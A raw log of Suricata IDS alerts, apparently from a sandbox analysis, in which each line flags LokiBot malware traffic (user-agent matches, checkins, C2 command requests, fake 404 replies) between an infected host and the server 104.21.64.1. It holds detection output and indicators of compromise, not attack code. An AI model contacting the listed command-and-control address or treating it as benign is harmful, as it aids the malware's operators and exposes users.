Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65166 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65174 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65149 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65158 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65149 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:64933
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65146 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65206 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65177 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65177 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65064 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65177 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65064 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65139 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65192 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65166 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65192 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65166 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65149 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65146 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65139 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65181 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65153 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65181 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65166 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65064 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65166 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65146 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65045 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65173
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65139 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65181 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65146 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65185 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65185 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65168 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65168 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65168 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65181 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65185 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65181 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65168 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:64957 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65168 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65192 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65185 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65177 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65185 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65201 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65177 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65201 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65075 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65201 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65075 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65064 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65075 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65201 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65201 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65017 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65191 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65191 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65075 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65075 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65159 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65153 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65159 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65191 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65159 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65158
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65124
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65178 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65191 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65191 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65159 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65167 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65167 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65167 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65166
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65159 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65185
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65206
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65192 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65167 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65192 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65181
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65153 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65177
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65153 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65170 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65174 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65174 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65198 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65198 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65198 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65200
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65190 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65170 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65174 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65190 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65064
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65148 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65174 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65198 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65201
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65198 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65170 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65190 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65163 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65194 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65188 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65194 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65188 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65194 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65163 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65163 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65170 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65190 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65190 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65188 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65170 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65194 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65196 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65194 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65163 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65191
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65163 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65188 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65188 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65196 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65196 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65101 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65196 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:64957 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:64967 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:64957 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65198
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:64957 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65075
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:64957 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65174
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65193 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65196 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65095 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65167 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65170
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65193 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65193 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65194
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65017 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65207 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65101 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65017 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65101 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65193 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65207 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65193 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65207 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65163
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65204 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65204 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65204 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65203 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65203 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65203 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65207 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65175 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65207 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65175 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65175 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65153
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65204 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65203 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65204 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65203 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65101 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65101 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65199 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65199 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65199 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65175 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65175 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65156 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:65199 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:65156 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:65156 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:65199 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:65211 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.6:65178
